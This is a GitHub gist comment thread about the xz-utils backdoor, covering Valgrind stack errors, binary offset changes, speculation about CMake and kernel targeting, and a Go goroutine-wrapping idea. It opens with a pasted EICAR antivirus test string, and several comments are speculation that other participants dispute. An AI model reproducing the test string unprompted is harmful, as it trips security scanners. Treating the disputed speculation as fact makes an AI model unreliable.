X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

i have done my duty and shown good will

@dnorthup-ums
Copy link

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@paulfloyd The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones). As for the 64-bit 0x77... or 0xDD2A.... addresses, it looks to me like something is trying to be clever and take advantage of the "hole" between typical user space and kernel space when injecting the payload via ifunc. I suspect if you look at one of the disassembly attempts of the exploit you'll get more insight into what is going on there and why those are important (as noted, I strongly suspect they are).

@AdrianBunk
Copy link

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.

@flybyray Conspiracy theories and insults from people like you are not helpful.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Please stop it.

@AdrianBunk
Copy link

AdrianBunk commented Apr 12, 2024

The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones).

All major distributions (including Debian) changed their compiler to default to PIE several years ago for ASLR.

@christoofar
Copy link

christoofar commented Apr 13, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

When we talked it out, the function that was doing this nuke (microlzma is what Jia Tan wants to raise during init), did not supply a size when it entered the loop to start writing 0x00 into a stack area.

This function, lzma_stream_header_encodb, is not in the 5.6.1 .o release, it only appears in the 5.6.0; hence the theory that a mistake in the feature flags for the build did not completely strip out the setup for a debug/examine tool (which would have reported out the progress of the locator and possibly also brought in a more comprehensive debug/examine tool as an option). My guess is that it's not a mistake in the offsets calculations (there is a whole DASM library inside the malware), but a way to quickly patch the obfuscations in while still making sure that the hotloading core code stays functional.

Jan Tan needed someway to know that he landed on all the jump calls needed to patch libcrypto.

Further: The final 5.6.1 has an insert in the ELF table for a note area that is moving all the bytes down 0x26, and throwing the asm dumps into diff shows a heavy amount of offset changes in microlzma, the gateway to the backdoor.

@christoofar
Copy link

christoofar commented Apr 13, 2024

I've been thinking a lot about this as a CGo/gccgo dev: "What can a HLL programmer do against the likes of Jia Tan? They're attacking from the foundation software."

I'm not settled on this one but wrapping calls to C libs in goroutines probably would raise the difficultly level, as the rapid context switches and unpredictability introduced on where the Go runtime will move the jump calls happens.

After 129,000 lines of asm, here is printf("Hello World") in Go down at the bottom:
image

Now, let's see what happens when we do this:

func main() {
	hello := "Hello world!"
	go func() {
		print(hello)
	}()
	time.Sleep(1*time.Second)
}

Now we're asking the Go runtime to activate concurrency and main itself gets split into two compact parts with an anonymous function that disappears into the goroutine ecosphere (to get this to fit I'm stripping symbols):
image
image

Notice how nice and compact the goroutine is! Not many things you can do here but try to intercept the ret and call instructions, but you will need to also make sure the runtime stack cleanup happens or things will start to go crashycrashy.

So now let's make a C lib call but push it down into a goroutine wrapper, yet make it synchronous. And for fun, the data to the function will be passed via a channel, which brings in the communication/sync areas of the runtime with its maze of runtime functions. And since we're here, let's make it a full Go wrapper, with two channels and a goroutine bridge, and a done signaler.

package main

// #include <stdio.h>
// #include <stdlib.h>
// void printFromC(const char* str) {
//     printf("Received C string: %s\n", str);
// }
import "C"
import "unsafe"

func main() {
	myPrint("Hello from Go!")
}

func myPrint(hellostring string) {
	// Protect the C library call from Jia Tan and the NSA
	sendchan := make(chan string)
	recvchan := make(chan string)
	done := make(chan bool)
	
	go func(sender chan string, receiver chan string){ // This chan is send-only
		go func(receive <-chan string) { // This one is recv-only
			callCPrint(receive)
			done <- true
		}(receiver)
		go func() {
			strToSend := <- sender
			receiver <- strToSend
			close(sender)
			return
		}()
	}(sendchan, recvchan)

	sendchan <- hellostring
	<-done
	return
}

func callCPrint(str <-chan string) {
	cStr := C.CString(<-str)
	defer C.free(unsafe.Pointer(cStr)) // Deallocate memory when done
	C.printFromC(cStr)
}

The main() in asm representation gets shorter
image

But now there is some real fun going on in myPrint() as it's acting as a traffic cop moving the string along its way into the chaos of pthread, with its context switches and semaphores. myPrint is split by the compiler into 6 asm functions (one each for the launch point and anonymous function of the three goroutines) to allow for their dynamic reallocation to the runtime.

image
That goes on for pages.

callCPrint then has a thunk going on, which can't get back its data to myPrint without going back through the runtime maze.
image

I'm still not sold on this approach but I'm definitely willing to change my own behavior to make these creeps go away if the difficulty is raised high enough. And throwing CGo calls through a goroutine bridge still makes readable code to me.

@tdkuehnel
Copy link

Beside the technical things involved around this incident, which required profound knowledge and ability to develop and implement such an attack, the weak point and what was easy to establish was the social factor of the attack. It took only two persons working together to nudge the project maintainer out of the way. THAT is the real catastrophy.

We need to use the internet to represent our real social connections, not to throw the whole world into one community driven by some huge content aggregators. The real power of the internet is still hidden in its decentralized inherent structure, which we are using and taking benefit of only in small amounts today.

Yes, client-server brought the whole internet thing up to live, but now we are adult enough to decide for our own with whom to share and connect directly and how to decide who has access to which part of my own data. My comments are my data, every content i create is my data, it has to be distributed by the network of the poeple i know and trust, by their devices. Not by content aggregators. When i watch a yt video or other content, i want to see the comments of my friends and social contacts first, access the comments from their data stores directly. Better let me decide and configure which comments to see at all, not let it be dictated by some content aggregators which are deadstuck in their own development. The whole internet has to be shaped around our social contacts and networks, not be dictated by some content aggrgators. /rant off.

@cwegener
Copy link

cwegener commented Apr 14, 2024 via email

@avbentem
Copy link

@cwegener I'm guessing @tdkuehnel may be referring to what happened in 2022 according to a list of events curated by @boehs.

@flybyray
Copy link

flybyray commented Apr 14, 2024

@flybyray Conspiracy theories and insults from people like you are not helpful.

Perhaps you are in a position to take your sort of interference as an insult.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Are you implying that I am trying to claim something without a proof? And you try it to do only with a mere personal assertion? Pipes!

Please stop it.

I hope you do that and come back next time with meaningful additions and statements.
I also hope that you understand what an honest discussion is, that you have to fight back when others try to play unfair by ignoring essential context or trying to distort the meaning of statements.

To get back on track:

  • I joint this discussion just by pointing out that the ultimate target for a supply chain attack will be the kernel. I was just missing something here.
  • that there were surprising changes in the linux-next repo shortly before the backdoor became known. 20/03/2024
  • discussions on the kernel mailing regarding this change to remove it, but it was already pushed into linux-next
    • now there is a newer comment https://lwn.net/ml/linux-kernel/20240404170103.1bc382b3@kaneli/ i am happy that my concern is addressed there. but i would be more happy if they would handle all compression tools equally. there should be a strict interface to comply with. i am not sure why only xz should be allowed to run in different form - it just shows that its internal working is to complex.

Exactly what this recent conclusion section states:
"...
It’s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the XZ repository, as well as the complex code contained within the binary itself.

There is still much more to explore about the backdoor’s internals, which is why we have decided to present this as Part I of the XZ backdoor series. ..."

"the binary itself" could not be ignored as the master plan ( "golden piece") for a targeted supply chain kernel attack.
especially the mentioned discussions put important things( tangible error ) on the table.
there may be other tools that are part of the build process and are assumed to be safe without question. someone has this concern even tries to scan complete package trees https://github.com/hlein/distro-backdoor-scanner

i fear the structure of a suitable defense will look more complex.

hopefully automation and statistics can help to spot risks.
like you need to track maintainers and their commitment to projects. this is just an example:
"""
Many open-source software (OSS) projects are self-organized and do not maintain official lists with information on developer
roles. So, knowing which developers take core and maintainer roles is, despite being relevant, often tacit knowledge. We propose
a method to automatically identify core developers based on role permissions of privileged events triggered in GitHub issues
and pull requests. In an empirical study on 25 GitHub projects, (1) we validate the set of automatically identified core developers
with a sample of project-reported developer lists, and (2) we use our set of identified core developers to assess the accuracy of
state-of-the-art unsupervised developer classification methods. Our results indicate that the set of core developers, which
we extracted from privileged issue events, is sound and the accuracy of state-of-the-art unsupervised classification methods
depends mainly on the data source (commit data vs. issue data) rather than the network-construction method (directed vs.
undirected, etc.). In perspective, our results shall guide research and practice to choose appropriate unsupervised classification
methods, and our method can help create reliable ground-truth data for training supervised classification methods.
"""
ref: https://www.se.cs.uni-saarland.de/publications/docs/BAJ+23.pdf

@calestyo
Copy link

calestyo commented Apr 14, 2024

I'm not the admin here (so obviously @thesamesam decides what this is about and not me), but I had the impression so far that this gist was primarily giving an overview/index/references to the XZ backdoor - not about actual in-depth discussion about the various fields (reverse engineering, OSint, etc. pp) related to it.

That was the nice thing about it, getting only really new/concrete stuff from it.

There do seem to be numerous places which are dedicated to in-depth discussion (and arguing ;-) ) like https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint).

@AdrianBunk
Copy link

I joint this discussion just by pointing out that the ultimate target for a supply chain attack will be the kernel.

That's nonsense.

Nothing you provided indicates that there was actually anything malicious submitted to the kernel, and it would be unbelievably stupid for the attacker to try to add more exploits since this would increase the risk that the openssh backdoor gets detected.

The openssh backdoor would have given the attacker remote administrator access to most Linux servers on the internet.
This is already the ultimate backdoor.

And here is not the right place for people to present whatever thoughts or theories they come up with, please do that in a more appropriate location.

@the-lne
Copy link

the-lne commented Apr 15, 2024 via email

@thesamesam
Copy link
Author

It makes my life a lot easier if the comment section here is kept for editorial changes I need to make, extra sources, etc.

Please keep theorising to other forums. Thanks!

@felipec
Copy link

felipec commented Apr 15, 2024

@thesamesam this is a good resource I think: https://github.com/felipec/xz-min.

@thesamesam
Copy link
Author

Thanks @felipec! I have a few other things to go over in the backlog and can hopefully include them all in a batch later today or tomorrow.

@dnorthup-ums
Copy link

@thesamesam
Sam, et al:
I think there's another "Easter Egg" in there... Looking again, closely, at Lasse's f9cf4c05 commit (the tukaani repo) and his 02e35059 commit, and then re-reading the build tools scripts, it looks like "Jia" intended to be able to use TCP connections from inside of XZ on platforms built with CMAKE. There's got to be some way to invoke that. Perhaps he hadn't finished implementing that part yet..., but I think that somebody with better fuzzing skills than mine should give it a close look. The good news is that Lasse re-enabled the Landlock function for CMAKE builds...., presuming that "Jia" hadn't hidden something in the Landlock code.

Since there's apparently zero interest, here or elsewhere, about following up on "Jia"'s fairly obvious attempt to weaponize the cmake builds, I'm outta here. I'm not hard to find should anybody not manage to make sense of what I said earlier, but I'm not bothering to follow the conversation here anymore.

@thesamesam
Copy link
Author

OK, gone through comments, please let me know if I missed any changes either from here in the last few days or generally on the internet. Thanks!

@roccotanica1234
Copy link

Jia Tan's account, associated to jiat0218@gmail.com on Twitter is: https://twitter.com/JiaT03868010 (I haven't find it mentioned anywhere)

I just noticed that Jia Tan's Twitter registration date (Dec 2020) is earlier than Github registration date. (26 Jan 21)

image

@pillowtrucker
Copy link

did we gett'em yet

@calestyo
Copy link

@thesamesam
Copy link
Author

@calestyo Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment